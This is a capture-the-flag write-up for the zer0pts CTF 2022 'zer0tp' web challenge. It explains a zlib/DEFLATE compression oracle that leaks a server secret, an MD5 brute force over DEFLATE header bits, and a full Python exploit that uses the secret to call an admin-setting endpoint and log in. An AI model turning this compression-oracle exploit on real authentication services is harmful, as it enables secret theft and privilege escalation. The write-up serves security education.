# zer0tp - zer0pts CTF 2022
###### tags: `writeup` `zer0pts CTF 2022` `web`
Writeups: https://hackmd.io/@ptr-yudai/rJgjygUM9
# Overview
## Application Overview
```
[ How does Zer0TP work? ]
+--------+ +-------------+
| Zer0TP |<------>| third party |
+--------+ e +-------------+
^ ^ | ^
a| b| c| |
| | v d|
+--------+ |
| user |-----------+
+--------+
Third party software can use zer0tp as its authentication scheme.
a. The user registers an account on zer0tp
b. User logs in to zer0tp to issue an OTP
c. zer0tp will issue a client token
d. User sends the client token to the third part software
e. Third part software can authenticate the user by the token
```
## Essential Point
Leak the secret:
```python=
import os
import zlib
import base64
import signal
import hashlib
signal.alarm(30 * 60)
secret = base64.b64encode(os.urandom(12))
assert len(secret) == 16
while True:
username = input().encode()
assert 4 <= len(username) <= 50
id = os.urandom(8).hex().encode()
hash = hashlib.md5(id + (zlib.compress(username + secret)[:8]))
print(id, hash.hexdigest())
```
##
# Solution
## TL; DR
You can leak the secret from the following:
```python=
import os
import zlib
import base64
secret = base64.b64encode(os.urandom(12))
assert len(secret) == 16
for i in range(1024):
username = input().encode()
assert 4 <= len(username) <= 50
print(zlib.compress(username + secret)[2])
```
## Summary
You can enforce DEFLATE to compress with the dynamic Huffman codes mode using the well-created username such as [de Bruijn Sequence](https://en.wikipedia.org/wiki/De_Bruijn_sequence). In this mode, the first byte of the DEFLATE compression (=third byte of the Zlib compression, since the first two bytes are the header) contains the information for the max length of the repeating sequence. Using this, you can extract the keys one by one. You can reverse the md5 in the seconds by brute force using the lack of entropy of the structure of DEFLATE.
## Details
This problem is divided into two main parts: the first part is to reverse md5; the second part is to leak the secret using the Zlib compression. For the sake of brevity, we will explain the second part first.
### Speed learning: DEFLATE
DEFLATE is the format for the compression. Usually, it forms from multiple blocks, but in the case of this task, you will not see such kind of situation since data is too small. The block has 3 types; Non-compressed, fixed Huffman, and dynamic Huffman. Other than non-compressed block uses the **dictionary-based coding**, which records the pair of offset and length instead of the actual string. This information is also coded by Huffman code. The actual character of the strings and the length is **represented using the same Huffman code**.
The following is a pseudo-parser of the part essential for this problem.
```python=
res = ''
while True:
is_final = stream.read_bits(1)
block_type = stream.read_bits(2)
if block_type == 0b00: ... # Non-compressed blocks (truncated)
if block_type == 0b01: ... # Compression with fixed Huffman codes (truncated)
if block_type == 0b10: # Compression with dynamic Huffman codes
code_for_chrlen_length = stream.read_bits(5) + 257
code_for_distance_length = stream.read_bits(5) + 1
code_for_huffman_length = stream.read_bits(4) + 4
code_for_huffman = []
for i in range(code_for_huffman_length):
code_for_huffman.append(stream.read_bits(3))
... # reading huffman code for the distance and code for the character or length (truncated)
while True:
# read one symbol from stream using huffman tree
symbol = read_symbol(stream, code_for_chrlen)
if symbol < 256: res += ord(symbol) # actual character
elif symbol == 256: break # end of block (not important)
else:
assert 257 <= symbol <= 285
# **length is parsed from symbol**, additional information may be provided from stream
length = parse_length(symbol, stream)
... # parsing distance and decompress (truncated)
if is_final == 0b1: break
```
You can earn more infomations by looking at [RFC1951 - DEFLATE Compressed Data Format Specification version 1.3](https://datatracker.ietf.org/doc/html/rfc1951)<!--, or [DEFLATE information dumper](TBD) that I made by modifying [simple DEFLATE decompressor](https://github.com/nayuki/Simple-DEFLATE-decompressor/blob/master/python/deflatedecompress.py)-->.
### Speed learning: Zlib
Zlib is just the wrapper of DEFLATE. Zlib generated by default `zlib.compress` has the following format:
```
0 1
+---+---+=====================+---+---+---+---+
|CMF|FLG|...compressed data...| ADLER32 |
+---+---+=====================+---+---+---+---+
```
> quoted from: [RFC1950 - ZLIB Compressed Data Format Specification version 3.3](https://datatracker.ietf.org/doc/html/rfc1950)
`CMF` and `FLG` is always same as long as you are using the default settings. `ADLER32` is the checksum.
### Second Part
First, consider how to force `zlib.compress` to use dynamic Huffman mode. To beat the efficiency of fixed Huffman, you need to have a few character types as possible appear in as many as possible with no large repetition. With some experiments, you can find that more than 3 characters of repetition will be compressed. Therefore, we look for the string with the fewest number of characters that appear in a string that has no repetitions of length more than 3. Luckily, this kind of string has a name, which is [de Bruijn Sequence](https://en.wikipedia.org/wiki/De_Bruijn_sequence). Using this, you can accomplish the goal.
Next, let's find out an oracle that can be used to leak the secret characters one by one. The third byte[^tb] of compressed data contains the size of the Huffman code for the character and the length. This is 257[^1] if there are no repetitions, and more than 258 if there are. Thus, we can detect whether there are repetitions or not. With the observation that more than 3 bytes of repetitions will be compressed, you can leak the entire secret.
[^tb]: structure of first 3 bytes are: 2 bytes for constant + 1 bit for is_final + 2 bit for block_type + 5 bit for the length of huffman code we need
[^1]: Need to use `256: End of the Block` at the end of stream
```python=
import os
import zlib
import string
import base64
SECRET_LEN = 16
secret = base64.b64encode(os.urandom(12))
assert len(secret) == SECRET_LEN
def oracle(username):
assert 4 <= len(username) <= 50
return zlib.compress(username + secret)[2]
# |Σ|=4, n=3
DE_BRUIJN_TEMPLATE = b'000100200301101201302102202303103203311121131221231321332223233300'[:0x30-5]
DE_BRUIJN = b''.join([bytearray([c - ord('0')]) for c in DE_BRUIJN_TEMPLATE])
PREFIX = b'#$'
ALPHABET = (string.ascii_letters + string.digits + "+/").encode()
init = PREFIX
def solve(cur):
print(f'[+] {cur=}')
if len(cur) - len(init) == SECRET_LEN:
return cur[len(init):]
res = None
for c in ALPHABET:
if res is not None: break
payload = DE_BRUIJN + cur[-2:] + bytearray([c]) + PREFIX
if (oracle(payload) >> 3) == 0: continue
res = solve(cur + bytearray([c]))
return res
res = solve(init)
assert res is not None
print(res)
assert secret == res
```
### First Part
If we tally up the possible bits of each semantic unit[^su] are, we find that there are only about a $10^6$ possible combinations. With this level of number, we can brute force to reverse the md5.
[^su]: chunks read by read_bits in above pseudo-parser
```python=
import os
import zlib
import string
import base64
from hashlib import md5
from itertools import product
SECRET_LEN = 16
block_lens = [
16, # zlib header
1, # bfinal
2, # btypes
5, # code for charactor/length length
5, # code for distance length
4, # code for huffman length
*([3] * 10), 1 # for huffman
]
assert(sum(block_lens) == 64)
blocks = [(l, set()) for l in block_lens]
def add_block_info(data):
bindata = int.from_bytes(data, "little")
def next(n):
nonlocal bindata
res = bindata & ((1 << n) - 1)
bindata >>= n
return res
for length, cands in blocks:
val = next(length)
cands.add(val)
# |Σ|=4, n=3
DE_BRUIJN_TEMPLATE = b'000100200301101201302102202303103203311121131221231321332223233300'[:0x30-5]
DE_BRUIJN = b''.join([bytearray([c - ord('0')]) for c in DE_BRUIJN_TEMPLATE])
PREFIX = b'#$'
ALPHABET = (string.ascii_letters + string.digits + "+/").encode()
print("[+] calculating candidates of each blocks...")
for i in range(1000):
s = base64.b64encode(os.urandom(12))
cur = PREFIX
while len(cur) != len(PREFIX + s):
for c in ALPHABET:
payload = DE_BRUIJN + cur[-2:] + bytearray([c]) + PREFIX
data = zlib.compress(payload + s)
add_block_info(data)
cur += bytearray([s[len(cur) - len(PREFIX)]])
combs = 1
for _, cands in blocks: combs *= len(cands)
print(f"[+] calculated. {combs=}")
assert len(blocks[1][1]) == 1
assert len(blocks[2][1]) == 1
prod = list(product(*[[*cands] for _, cands in blocks]))
def compute_blocks(salt, hash):
for block_vals in prod:
data = 0
bit_len = 0
def add(b, len):
nonlocal data, bit_len
assert b < 2 ** len
data += (b << bit_len)
bit_len += len
for val, length in zip(block_vals, block_lens):
add(val, length)
assert(bit_len == 64)
cur_hash = md5(salt + data.to_bytes(bit_len // 8, "little")).digest()
if hash != cur_hash: continue
return block_vals
assert False
CNT = 100
for i in range(100):
print(f'[+] testing {i + 1} / {CNT}')
secret = base64.b64encode(os.urandom(12))
assert len(secret) == SECRET_LEN
salt = os.urandom(16).hex().encode()
payload = DE_BRUIJN + secret[10:][:3] + PREFIX
hash = md5(salt + zlib.compress(payload + secret)[:8]).digest()
compute_blocks(salt, hash)
```
### Exploit
```python=
import os
from itertools import product
from random import shuffle
import string
import zlib
import base64
import requests
from hashlib import md5
APP_HOST = os.getenv("APP_HOST", "localhost")
APP_PORT = os.getenv("APP_PORT", "8077")
ZER0TP_HOST = os.getenv("ZER0TP_HOST", "localhost")
ZER0TP_PORT = os.getenv("ZER0TP_PORT", "8080")
SECRET_BYTES = 12
SECRET_LEN = len(base64.b64encode(os.urandom(SECRET_BYTES)))
# |Σ|=4, n=3
DE_BRUIJN_TEMPLATE = b'000100200301101201302102202303103203311121131221231321332223233300'[:0x30-5]
DE_BRUIJN = DE_BRUIJN_TEMPLATE
l = list(range(0x20))
shuffle(l)
head = l[:4]
for i, c in enumerate(head):
DE_BRUIJN = DE_BRUIJN.replace(str(i).encode(), bytearray([c]))
prev_username = DE_BRUIJN
password = 'p4ssw0rd'
res = requests.post(f'http://{ZER0TP_HOST}:{ZER0TP_PORT}/api/register', {
"username": prev_username,
"password": password
}).json()
assert res["result"] == "OK"
print(f'[+] registered as {prev_username}')
q = 0
def oracle(query: bytes):
global q, prev_username
q += 1
assert all(0 <= c < 0x80 for c in query) and len(query) < 50
res = requests.post(f'http://{ZER0TP_HOST}:{ZER0TP_PORT}/api/rename', {
"username": prev_username.decode(),
"password": password,
"new_username": query.decode(),
"new_password": password
}).json()
assert res["result"] == "OK"
prev_username = query
res = requests.post(f'http://{ZER0TP_HOST}:{ZER0TP_PORT}/api/login', {
"username": query.decode(),
"password": password
}).json()
assert res["result"] == "OK"
return res["id"].encode(), bytes.fromhex(res["token"])
block_lens = [
16, # zlib header
1, # bfinal
2, # btypes
5, # code for character/length length
5, # code for distance length
4, # code for huffman length
*([3] * 10), 1 # stager canonical codes
]
assert(sum(block_lens) == 64)
blocks = [(l, set()) for l in block_lens]
def add_block_info(data):
bindata = int.from_bytes(data, "little")
def next(n):
nonlocal bindata
res = bindata & ((1 << n) - 1)
bindata >>= n
return res
for length, cands in blocks:
val = next(length)
cands.add(val)
PREFIX = b'#$'
ALPHABET = (string.ascii_letters + string.digits + "+/").encode()
print("[+] calculating candidates of each blocks...")
for i in range(1000):
s = base64.b64encode(os.urandom(SECRET_BYTES))
cur = PREFIX
while len(cur) != len(PREFIX + s):
for c in ALPHABET:
payload = DE_BRUIJN + cur[-2:] + bytearray([c]) + PREFIX
data = zlib.compress(payload + s)
add_block_info(data)
cur += bytearray([s[len(cur) - len(PREFIX)]])
combs = 1
for _, cands in blocks: combs *= len(cands)
print(f"[+] calculated.")
assert len(blocks[1][1]) == 1
assert len(blocks[2][1]) == 1
prod = list(product(*[[*cands] for _, cands in blocks]))
def compute_blocks(salt, hash):
for block_vals in prod:
data = 0
bit_len = 0
def add(b, len):
nonlocal data, bit_len
assert b < 2 ** len
data += (b << bit_len)
bit_len += len
for val, length in zip(block_vals, block_lens):
add(val, length)
assert(bit_len == 64)
cur_hash = md5(salt + data.to_bytes(bit_len // 8, "little")).digest()
if hash != cur_hash: continue
return block_vals
assert False
DEBUG = True
init = PREFIX
def solve(cur):
print(f'[+] {cur=}')
if len(cur) - len(init) == SECRET_LEN:
return cur[len(init):]
res = None
for c in ALPHABET:
if res is not None: break
payload = DE_BRUIJN + cur[-2:] + bytearray([c]) + PREFIX
salt, hash = oracle(payload)
if compute_blocks(salt, hash)[3] == 0: continue
res = solve(cur + bytearray([c]))
return res
res = solve(init)
assert res is not None
response = requests.post(f'http://{ZER0TP_HOST}:{ZER0TP_PORT}/api/set_admin', {
"username": prev_username.decode(),
"secret": res.decode(),
"admin": "1"
}).json()
print(response)
assert response["result"] == "OK"
username = base64.b64encode(os.urandom(SECRET_BYTES)).decode()
id, token = oracle(username.encode())
s = requests.Session()
content = s.post(f'http://{APP_HOST}:{APP_PORT}/login', {
"username": username,
"id": id,
"token": token.hex()
}).content
print(content)
print(content.split(b'<h1>')[1].split(b'</h1>')[0])
print(f'{q=}')
```